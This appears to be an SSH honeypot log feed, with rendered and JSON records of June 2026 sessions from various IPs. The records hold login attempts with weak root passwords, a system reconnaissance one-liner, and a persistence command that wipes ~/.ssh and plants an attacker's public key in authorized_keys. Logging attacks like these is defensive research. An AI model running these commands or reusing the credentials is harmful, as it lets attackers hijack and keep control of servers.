2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"

[obs-node]:~$ uname -s -v -n -m 2 > /dev/null

[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null

[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null

Command not found: /usr/bin/uname -s -v -n -m

[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null

[obs-node]:~$ ( [ -f /proc/version ]

[obs-node]:~$ [ -f /proc/version ]

[obs-node]:~$ head -1 /proc/version | cut -d -f1

[obs-node]:~$ [ -f /etc/os-release ]

Record ID: 7ea19f2ddb6c

Client Version: SSH-2.0-Go

Engagement Duration: 1.3s

HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5

{
  "id": "7ea19f2ddb6c",
  "src_ip": "2.57.122.150",
  "start_time": "2026-06-30T07:09:58.570268Z",
  "end_time": "2026-06-30T07:09:59.830853Z",
  "duration": "1.3",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "123456"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "SUCCESSFUL LOGIN",
    "RECONNAISSANCE",
    "COMMANDS RUN"
  ]
}

14.103.63.16

2026-06-30 07:09:38.113339 UTC

SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 426744021740

Client Version: Unknown

Engagement Duration: 2m 0s

{
  "id": "426744021740",
  "src_ip": "14.103.63.16",
  "start_time": "2026-06-30T07:09:38.113339Z",
  "end_time": "2026-06-30T07:11:38.132193Z",
  "duration": "120.0",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}

220.127.148.6

2026-06-30 07:09:05.354899 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: msb

Record ID: fb0567a91534

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "fb0567a91534",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:09:05.354899Z",
  "end_time": "2026-06-30T07:09:07.331817Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "msb",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

37.60.225.239

2026-06-30 07:08:40.409042 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: ppp

Record ID: c78afb9b41aa

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "c78afb9b41aa",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:08:40.409042Z",
  "end_time": "2026-06-30T07:08:42.376001Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "ppp",
      "pass": "ppp"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

152.53.0.56

2026-06-30 07:07:56.720891 UTC

SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: eda0c51703bc

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 1.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "eda0c51703bc",
  "src_ip": "152.53.0.56",
  "start_time": "2026-06-30T07:07:56.720891Z",
  "end_time": "2026-06-30T07:07:57.739105Z",
  "duration": "1.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}

78.89.154.59

2026-06-30 07:07:54.672656 UTC

SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: e99e589c36fa

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 1.7s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "e99e589c36fa",
  "src_ip": "78.89.154.59",
  "start_time": "2026-06-30T07:07:54.672656Z",
  "end_time": "2026-06-30T07:07:56.345720Z",
  "duration": "1.7",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}

152.53.0.56

2026-06-30 07:07:54.551157 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: 2a37bfe02731

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "2a37bfe02731",
  "src_ip": "152.53.0.56",
  "start_time": "2026-06-30T07:07:54.551157Z",
  "end_time": "2026-06-30T07:07:56.563003Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

152.53.0.56

2026-06-30 07:07:52.438144 UTC

SUCCESSFUL LOGIN COMMANDS RUN SCORE: 80

Credential acceptance event recorded. Target authentication: root / qazwsx!

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh

Command not found: lockr -ia .ssh

[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

Record ID: a8004c6a2aff

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 5.3s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "a8004c6a2aff",
  "src_ip": "152.53.0.56",
  "start_time": "2026-06-30T07:07:52.438144Z",
  "end_time": "2026-06-30T07:07:57.736118Z",
  "duration": "5.3",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "qazwsx!"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "SUCCESSFUL LOGIN",
    "COMMANDS RUN"
  ]
}

78.89.154.59

2026-06-30 07:07:36.248960 UTC

SUCCESSFUL LOGIN COMMANDS RUN SCORE: 80

Credential acceptance event recorded. Target authentication: root / 7890

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh

Command not found: lockr -ia .ssh

[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

Record ID: afb220418b47

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 20.1s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "afb220418b47",
  "src_ip": "78.89.154.59",
  "start_time": "2026-06-30T07:07:36.248960Z",
  "end_time": "2026-06-30T07:07:56.342823Z",
  "duration": "20.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "7890"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "SUCCESSFUL LOGIN",
    "COMMANDS RUN"
  ]
}

220.127.148.6

2026-06-30 07:07:22.639517 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: vv

Record ID: ab117d754299

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.1s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "ab117d754299",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:07:22.639517Z",
  "end_time": "2026-06-30T07:07:24.706509Z",
  "duration": "2.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "vv",
      "pass": "vv"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

37.60.225.239

2026-06-30 07:06:06.307390 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sponsors

Record ID: 7d32e6218481

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.1s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "7d32e6218481",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:06:06.307390Z",
  "end_time": "2026-06-30T07:06:08.361755Z",
  "duration": "2.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "sponsors",
      "pass": "sponsors123"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

171.220.244.134

2026-06-30 07:05:50.726033 UTC

SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: c0e68132153c

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 1.9s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "c0e68132153c",
  "src_ip": "171.220.244.134",
  "start_time": "2026-06-30T07:05:50.726033Z",
  "end_time": "2026-06-30T07:05:52.599134Z",
  "duration": "1.9",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}